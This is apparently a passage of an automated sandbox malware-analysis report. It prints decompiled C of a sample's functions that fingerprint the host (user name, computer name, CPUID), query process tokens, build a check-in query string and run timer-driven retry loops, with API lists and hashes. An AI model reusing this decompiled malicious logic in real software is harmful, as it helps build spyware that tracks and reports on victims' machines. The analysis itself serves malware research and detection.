					 *_t69 =  *_t69 ^  *0xe8a2d0 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xe8a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00E8283A(_v8 + _v8, _t63);
							}
							HeapFree( *0xe8a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xe8a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00E8283A(_v8 + _v8, _t63);
						}
						HeapFree( *0xe8a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00e84454
0x00e8445c
0x00e84462
0x00e84465
0x00e84468
0x00e8446a
0x00e8446f
0x00e8446f
0x00e84475
0x00e84477
0x00e84484
0x00e844e5
0x00e84486
0x00e8448b
0x00e84491
0x00e84496
0x00e844a4
0x00e844a8
0x00e844b7
0x00e844be
0x00e844c5
0x00e844c5
0x00e844d0
0x00e844d0
0x00e844a8
0x00e84496
0x00e844e7
0x00e844ed
0x00e844f7
0x00e844f9
0x00e844fe
0x00e8450d
0x00e84511
0x00e8451c
0x00e84523
0x00e8452a
0x00e8452a
0x00e84536
0x00e84536
0x00e84511
0x00e8453f
0x00e84541
0x00e84544
0x00e84546
0x00e84549
0x00e8454c
0x00e84556
0x00e8455a
0x00e8455e

APIs

GetUserNameW.ADVAPI32(00000000,00E855CE), ref: 00E8448B
RtlAllocateHeap.NTDLL(00000000,00E855CE), ref: 00E844A2
GetUserNameW.ADVAPI32(00000000,00E855CE), ref: 00E844AF
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00E855CE,?,?,?,?,?,00E86BD8,?,00000001), ref: 00E844D0
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E844F7
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00E8450B
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00E84518
HeapFree.KERNEL32(00000000,00000000), ref: 00E84536

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: c269973e962a4df4ce0c20a9183e7d6760154e2c41ead79fcb1b29ecc6257a24
Instruction ID: 02adbe87f5128c90a2909c46b0b4cd7bc159528ad4d3443ec416d7214a853e20
Opcode Fuzzy Hash: c269973e962a4df4ce0c20a9183e7d6760154e2c41ead79fcb1b29ecc6257a24
Instruction Fuzzy Hash: 6B310AB1A0020AAFDB21EFAADC81B6EB7F9FB44314F244469E50DE7261D735DE049B11

Uniqueness

Uniqueness Score: -1.00%

Function 00E82D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00E82D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00E86837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00E850CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00e82d13
0x00e82d14
0x00e82d15
0x00e82d16
0x00e82d17
0x00e82d1b
0x00e82d22
0x00e82d31
0x00e82d34
0x00e82d37
0x00e82d3e
0x00e82d41
0x00e82d44
0x00e82d47
0x00e82d4a
0x00e82d55
0x00e82d57
0x00e82d60
0x00e82d68
0x00e82d6a
0x00e82d7c
0x00e82d86
0x00e82d8a
0x00e82d99
0x00e82d9d
0x00e82da6
0x00e82dae
0x00e82dae
0x00e82db0
0x00e82db0
0x00e82db8
0x00e82dbe
0x00e82dc2
0x00e82dc2
0x00e82dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00E82D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00E82D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00E82D7C

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00E82D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00E82DA6
NtClose.NTDLL(00000000), ref: 00E82DB8
NtClose.NTDLL(00000000), ref: 00E82DC2

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 91ed6b303788127a91f7caf8634293c459e8383894ad17749792ef64fb37aa9d
Instruction ID: 5fcc3878ff03cd7417f564c7ebfffd967e81a9a1d69754f9741c4c9bbd3e4679
Opcode Fuzzy Hash: 91ed6b303788127a91f7caf8634293c459e8383894ad17749792ef64fb37aa9d
Instruction Fuzzy Hash: 7621D4B2900219BFDB11AF95CC899DEBFBDEF08750F104066FA09F6160D7719A459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E846D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E846D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0xe8a018; // 0x87badb99
				asm("bswap eax");
				_t65 =  *0xe8a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0xe8a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0xe8a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0xe8a2d4; // 0x460d5a8
				_t3 = _t68 + 0xe8b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0xe8a02c,  *0xe8a004, _t63);
				_t71 = E00E86A09();
				_t72 =  *0xe8a2d4; // 0x460d5a8
				_t4 = _t72 + 0xe8b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0xe8a2d4; // 0x460d5a8
					_t8 = _t139 + 0xe8b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00E85040(_t144);
				_t77 =  *0xe8a2d4; // 0x460d5a8
				_t10 = _t77 + 0xe8b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0xe8a2d4; // 0x460d5a8
				_t12 = _t81 + 0xe8b7aa; // 0x5498d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0xe8b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0xe8a31c; // 0x54995e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0xe8a2d4; // 0x460d5a8
					_t18 = _t135 + 0xe8b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0xe8a32c; // 0x54995b0
				if(_t86 != 0) {
					_t132 =  *0xe8a2d4; // 0x460d5a8
					_t20 = _t132 + 0xe8b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0xe8a37c; // 0x5499630
				_t88 = E00E82885(0xe8a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0xe8a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0xe8a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0xe8a290, _t167, _v12);
						goto L28;
					}
					E00E82DD0(GetTickCount());
					_t95 =  *0xe8a37c; // 0x5499630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0xe8a37c; // 0x5499630
					__imp__(_t99 + 0x40);
					_t101 =  *0xe8a37c; // 0x5499630
					_t102 = E00E8624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0xe8a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0xe892ac);
					_push(_t163);
					_t107 = E00E821C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0xe8a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00E84AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00E81492();
						L24:
						HeapFree( *0xe8a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E00E826C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_t122 = E00E8161A(_t171, _a4, _a12, _a16); // executed
						_a20 = _t122;
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E00E850CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E00E8580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E00E850CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x00e846d1
0x00e846d1
0x00e846d1
0x00e846da
0x00e846df
0x00e846e6
0x00e846e8
0x00e846e8
0x00e846f5
0x00e84700
0x00e84703
0x00e8470e
0x00e84711
0x00e84716
0x00e84719
0x00e8471e
0x00e84721
0x00e8472d
0x00e8473a
0x00e8473c
0x00e84742
0x00e84747
0x00e84752
0x00e84754
0x00e84757
0x00e8475d
0x00e8475f
0x00e84767
0x00e84772
0x00e84774
0x00e84777
0x00e84777
0x00e84779
0x00e84780
0x00e84785
0x00e84792
0x00e84794
0x00e84799
0x00e847a1
0x00e847a4
0x00e847aa
0x00e847b5
0x00e847b7
0x00e847bc
0x00e847c1
0x00e847c4
0x00e847c9
0x00e847d4
0x00e847d6
0x00e847d9
0x00e847d9
0x00e847db
0x00e847e2
0x00e847e5
0x00e847ea
0x00e847f4
0x00e847f6
0x00e847f6
0x00e847f9
0x00e84807
0x00e8480c
0x00e84810
0x00e84813
0x00e849dd
0x00e849e5
0x00e849f2
0x00e84819
0x00e84825
0x00e8482d
0x00e84830
0x00e849cd
0x00e849d7
0x00000000
0x00e849d7
0x00e8483c
0x00e84841
0x00e8484a
0x00e8485b
0x00e8485f
0x00e84868
0x00e8486e
0x00e84876
0x00e8487b
0x00e84882
0x00e8488b
0x00e84891
0x00e849bd
0x00e849c7
0x00000000
0x00e849c7
0x00e8489d
0x00e848a3
0x00e848a4
0x00e848ab
0x00e848ae
0x00e849af
0x00e849b7
0x00000000
0x00e849b7
0x00e848b7
0x00e848bd
0x00e848c6
0x00e848cf
0x00e848da
0x00e848e1
0x00e848e4
0x00e849f5
0x00e84997
0x00e84997
0x00e8499c
0x00e849a7
0x00e849ad
0x00000000
0x00e849ad
0x00e848ee
0x00e848f5
0x00e848f8
0x00e848fd
0x00e84908
0x00e8490d
0x00e84910
0x00e84916
0x00e8491c
0x00e84922
0x00e84925
0x00e8492b
0x00e8492e
0x00e84933
0x00e84937
0x00e84937
0x00e84943
0x00e8494f
0x00e84953
0x00e84955
0x00e8495a
0x00e8495c
0x00e84961
0x00e84966
0x00e84973
0x00e8497b
0x00e8497e
0x00e8497e
0x00e8495a
0x00000000
0x00e84945
0x00e84949
0x00e84980
0x00e84983
0x00e8498c
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8498c
0x00e8494b
0x00000000
0x00e8494b
0x00e84943

APIs

GetTickCount.KERNEL32 ref: 00E846E8
wsprintfA.USER32 ref: 00E84735
wsprintfA.USER32 ref: 00E84752
wsprintfA.USER32 ref: 00E84772
wsprintfA.USER32 ref: 00E84790
wsprintfA.USER32 ref: 00E847B3
wsprintfA.USER32 ref: 00E847D4
wsprintfA.USER32 ref: 00E847F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E84825
GetTickCount.KERNEL32 ref: 00E84836
RtlEnterCriticalSection.NTDLL(054995F0), ref: 00E8484A
RtlLeaveCriticalSection.NTDLL(054995F0), ref: 00E84868

Part of subcall function 00E8624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E86278
Part of subcall function 00E8624D: lstrlen.KERNEL32(00000000,?,00000000,00E870D9,00000000,05499630), ref: 00E86280
Part of subcall function 00E8624D: strcpy.NTDLL ref: 00E86297
Part of subcall function 00E8624D: lstrcat.KERNEL32(00000000,00000000), ref: 00E862A2
Part of subcall function 00E8624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00E870D9,?,00000000,00E870D9,00000000,05499630), ref: 00E862BF

StrTrimA.SHLWAPI(00000000,00E892AC,?,05499630), ref: 00E8489D

Part of subcall function 00E821C1: lstrlen.KERNEL32(054987FA,00000000,00000000,00000000,00E87100,00000000), ref: 00E821D1
Part of subcall function 00E821C1: lstrlen.KERNEL32(?), ref: 00E821D9
Part of subcall function 00E821C1: lstrcpy.KERNEL32(00000000,054987FA), ref: 00E821ED
Part of subcall function 00E821C1: lstrcat.KERNEL32(00000000,?), ref: 00E821F8

lstrcpy.KERNEL32(00000000,?), ref: 00E848BD
lstrcat.KERNEL32(00000000,?), ref: 00E848CF
lstrcat.KERNEL32(00000000,00000000), ref: 00E848D5

Part of subcall function 00E84AA6: lstrlen.KERNEL32(?,00000000,05499C98,7742C740,00E813D0,05499E9D,00E855DE,00E855DE,?,00E855DE,?,63699BC3,E8FA7DD7,00000000), ref: 00E84AAD
Part of subcall function 00E84AA6: mbstowcs.NTDLL ref: 00E84AD6
Part of subcall function 00E84AA6: memset.NTDLL ref: 00E84AE8

wcstombs.NTDLL ref: 00E84966

Part of subcall function 00E8161A: SysAllocString.OLEAUT32(00000000), ref: 00E8165B
Part of subcall function 00E8161A: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00E816DD
Part of subcall function 00E8161A: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00E8171C

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 00E849A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00E849B7
HeapFree.KERNEL32(00000000,00000000,?,05499630), ref: 00E849C7
HeapFree.KERNEL32(00000000,?), ref: 00E849D7
HeapFree.KERNEL32(00000000,?), ref: 00E849E5

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 2871901346-0
Opcode ID: 7efcdc73256b1ac9722389d460c3928b5d5f804f36141805c3f93289e50dd2d0
Instruction ID: 1e4f6636e436a1326b8bd532a665b74f5ffa6fb86e1c729ba6042bd919c03630
Opcode Fuzzy Hash: 7efcdc73256b1ac9722389d460c3928b5d5f804f36141805c3f93289e50dd2d0
Instruction Fuzzy Hash: 0EA1607150010AEFDB21EFA9DC88EAA3BE9FF48314B184066F50DE7261D735D914DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E82022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00E82022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xe8a298);
					_v20 = 0;
					_v16 = 0;
					L00E87D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xe8a2c4; // 0x2fc
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xe8a2a4 = 5;
						} else {
							_t69 = E00E81AB8(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xe8a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00E85F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00E83032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xe8a29c);
							goto L21;
						} else {
							__eflags =  *0xe8a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00E81492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xe8a2a0);
								L21:
								L00E87D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xe8a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00e82022
0x00e82034
0x00e82037
0x00e82043
0x00e8204b
0x00e8204e
0x00e821b4
0x00e82054
0x00e82054
0x00e82056
0x00e8205b
0x00e8205c
0x00e82062
0x00e82065
0x00e82068
0x00e82076
0x00e82081
0x00e82084
0x00e82086
0x00e82093
0x00e8209d
0x00e820a1
0x00e820a4
0x00e820a9
0x00e820b4
0x00e820b4
0x00e820ab
0x00e820ab
0x00e820b2
0x00000000
0x00000000
0x00e820b2
0x00e820be
0x00000000
0x00e820c1
0x00e820c5
0x00e820d0
0x00e820d0
0x00e820d7
0x00e820dc
0x00e820e3
0x00e820ec
0x00e820f2
0x00e820f5
0x00e820fc
0x00e820ff
0x00000000
0x00000000
0x00e82101
0x00e82104
0x00e82107
0x00e8210a
0x00000000
0x00e8210c
0x00e8211b
0x00e8211b
0x00000000
0x00e82149
0x00e82149
0x00e8214e
0x00e8216d
0x00e8216f
0x00e82174
0x00e82175
0x00000000
0x00e82150
0x00e82150
0x00e82156
0x00000000
0x00e82158
0x00e82158
0x00e8215d
0x00e8215f
0x00e82164
0x00e82165
0x00e8217b
0x00e8217b
0x00e82183
0x00e8218e
0x00e82191
0x00e8219c
0x00e8219e
0x00e821a0
0x00e821a3
0x00000000
0x00e821a9
0x00000000
0x00e821a9
0x00e821a3
0x00e82156
0x00000000
0x00e8214e
0x00e8211e
0x00e82120
0x00e82123
0x00e82124
0x00e82124
0x00e82128
0x00e82132
0x00e82132
0x00e82138
0x00e8213b
0x00e8213b
0x00e82141
0x00e82141
0x00e821be
0x00000000

APIs

memset.NTDLL ref: 00E82037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00E82043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00E82068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00E82084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E8209D
HeapFree.KERNEL32(00000000,00000000), ref: 00E82132
CloseHandle.KERNEL32(?), ref: 00E82141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00E8217B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00E8560C), ref: 00E82191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00E8219C

Part of subcall function 00E81AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05499308,00000000,?,74B5F710,00000000,74B5F730), ref: 00E81B07
Part of subcall function 00E81AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05499340,?,00000000,30314549,00000014,004F0053,054992FC), ref: 00E81BA4
Part of subcall function 00E81AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00E820B0), ref: 00E81BB6

GetLastError.KERNEL32 ref: 00E821AE

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 41dc13a1ca4d7357b6fe238dc1fa268851502c35be2667ffa2bba0b0ae93b528
Instruction ID: 7c5da86309442e4c8c2e7955bdfc56fb86df5e646107d3059cf1c58186e9d17a
Opcode Fuzzy Hash: 41dc13a1ca4d7357b6fe238dc1fa268851502c35be2667ffa2bba0b0ae93b528
Instruction Fuzzy Hash: 0D516A71801228AEDF21AF95DC44DEEBFBCEF05324F24512AF61CB61A1D7758A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E853F2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00E853F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00E858F8();
				if(_t27 != 0) {
					_t77 =  *0xe8a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xe8a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xe8a148(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00E8696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xe8a2d4; // 0x460d5a8
					_push(0xe8a2fc);
					_push(1);
					_t7 = _t32 + 0xe8b5ad; // 0x4d283a53
					 *0xe8a2f8 = 0xc;
					 *0xe8a300 = 0;
					L00E84AF8();
					_t36 = E00E86384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00E84454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00E86837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
